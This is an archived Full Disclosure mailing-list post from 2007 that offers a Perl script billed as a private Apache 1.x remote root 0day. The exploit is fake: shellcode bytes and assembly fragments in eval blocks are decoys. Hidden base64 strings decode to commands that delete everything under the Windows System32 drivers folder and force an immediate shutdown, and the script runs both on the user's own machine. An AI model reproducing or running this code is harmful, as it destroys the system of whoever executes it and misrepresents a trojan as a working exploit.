Full Disclosure mailing list archives
A new apache 1.x 0day
From: x666 () Safe-mail net
Date: Mon, 19 Mar 2007 15:15:36 -0400
Hi, A new apache 1.x 0day #!/usr/bin/perl use MIME::Base64; use IO::Socket; use HTTP::Response; use HTTP::Status; use Getopt::Std; print q { ################################################################# ## ## Apache 1.X Remote Buffer Overflow getRoot() Exploit ## written by 666 - blueshisha () safe-mail net ## ## ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! ## ## If this is gonna be distributed, it will be my last one. ## ################################################################# }; if($#ARGV < 1) { print "[^] Usage : apache.pl [target] [port]\n"; print "[^] Example : apache.pl 127.0.0.1 80\n"; exit; } # Can be replaced, simply get a rootshell $shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46". "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f". "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6". "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06". "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc". "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d". "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f". "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6". "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06". "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc". "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d". "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65"; my $target = $ARGV[1]; my $port = $ARGV[2]; sub connect { local $SIG{'__DIE__'} = sub { (my $x = $_[0]) =~ s/0x/4/g; die $x }; eval { die "0x4141414141" }; print $@ if $@; } sub socket { push SOCKADDR; push SOCKDATA; push STACKDATA; push ESPOINT; push ENDADDR; } eval qw ( Bytecode: dec cx jz Root mov bp, FloppyOff ;offset pushf push cs push bp jmp [OldISR] Root: inc cx cmp dx, [SecondCntr] ;cs:. jne NotSecond IsSecond: mov bh,5 mov bl,21 call seg OSSetCursorXY:OSSetCursorXY ; root runs once mov ax,cx call seg OSPrintWordNum:OSPrintWordNum mov bh,5 mov bl,22 call seg OSSetCursorXY:OSSetCursorXY mov ax,[RootCntr] ;cs:. mov [RootCntr],0 ;cs:. call seg OSPrintWordNum:OSPrintWordNum ); { my ( @S, @T, @M ); my $code = ''; sub md5 { return undef if ( !defined $_[0] ); my $DATA = _md5_pad( $_[0] ); &_md5_init() if ( !defined $M[0] ); return _md5_perl_generated( \$DATA ); } sub _md5_init { return if ( defined $S[0] ); my $i; for ( $i = 1 ; $i <= 64 ; $i++ ) { $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) ); } my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 ); for ( $i = 0 ; $i < 64 ; $i++ ) { $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ]; } @M = ( 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2, 0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9 ); &_md5_generate(); my $TEST = _md5_pad('foobar'); } sub _md5_pad { my $l = length( my $msg = shift() . chr(128) ); $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 ); $l = ( $l - 1 ) * 8; $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 ); return $msg; } $mov = decode_base64("QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw="); $int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA=="); sub _md5_generate { my $N = 'abcddabccdabbcda'; my ( $i, $M ) = ( 0, '' ); $M = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); $code = <<EOT; sub _md5_perl_generated { BEGIN { \$^H |= 1; }; my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476); my (\$a,\$b,\$c,\$d,\$t,\$i); my \$dr=shift; my \$l=length(\$\$dr); for my \$L (0 .. ((\$l/64)-1) ) { my \@D = unpack('V16', substr(\$\$dr, \$L*64,64)); (\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D); EOT for ( $i = 0 ; $i < 16 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n"; } for ( ; $i < 32 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n"; } for ( ; $i < 48 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n"; } for ( ; $i < 64 ; $i++ ) { my ( $a, $b, $c, $d ) = split( '', substr( $N, ( $i % 4 ) * 4, 4 ) ); $code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n"; $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n"; } $code .= <<EOT; \$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff; \$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff; } # for return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); } EOT eval "$code"; } } sub rehash { my $unencrypted_string = shift @_; my @salt_chars = ('a'..'z','A'..'Z','0'..'9'); my $salt = $salt_chars[rand(63)] . $salt_chars[rand(63)]; return crypt($unencrypted_string, $salt); } eval qw ( make_startup_room: ; setup ebp for WSAStartup data push BYTE 20 ; push 20 pop eax ; register mul eax ; square that shit = 0x190 sub esp, eax ; make room for WSAStartup data mov ecx, esp make_table_room: ; setup ebp for address table sub esp, BYTE (_WSA_INIT_TBLEN * 4) push edi ; [ebp + 8] = LoadLibraryA push esi ; [ebp + 4] = LGetProcAddress push ebx ; [ebp + 0] = kernel32 dll base mov ebp, esp push ecx ; push WSAStartup data address push eax ; push 0x190 make_table: ; hash the table WSA_HASH_WINSOCK wsa_startup: ; call WSAStartup WSA_CALL_WSASTART make_socket: ; call WSASocketA, get a tcp socket WSA_CALL_SOCKET 'tcp' ; we got the socket in edi );system ($mov);system ($int);shift; eval qw ( push word 0x4D2 inc ebx push bx mov ecx, esp push byte 16 push ecx push eax mov ecx, esp mov al, 102 int 0x80 ); print "[x] Exploiting...\n"; sleep(4); eval qw < accept: push eax push edi mov ecx, esp inc ebx mov al, 102 int 0x80 dup2: xor ecx, ecx mov cl, 3
;
if ($recvdata != 0) { print "[x] Executing Shellcode..."; } if ($recvdata == 0) { print "[x] Exploit failed!"; } eval qw < exec: xor eax,eax mov al, 11 push ecx push "//sh" push "/bin" mov ebx, esp push ecx push ebx mov ecx, esp int 0x80
;
exit; _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- A new apache 1.x 0day x666 (Mar 19)
- Re: A new apache 1.x 0day Thierry Zoller (Mar 19)
- Re: A new apache 1.x 0day don bailey (Mar 19)
- Re: A new apache 1.x 0day Knud Erik Højgaard (Mar 19)
- Re: A new apache 1.x 0day Thierry Zoller (Mar 19)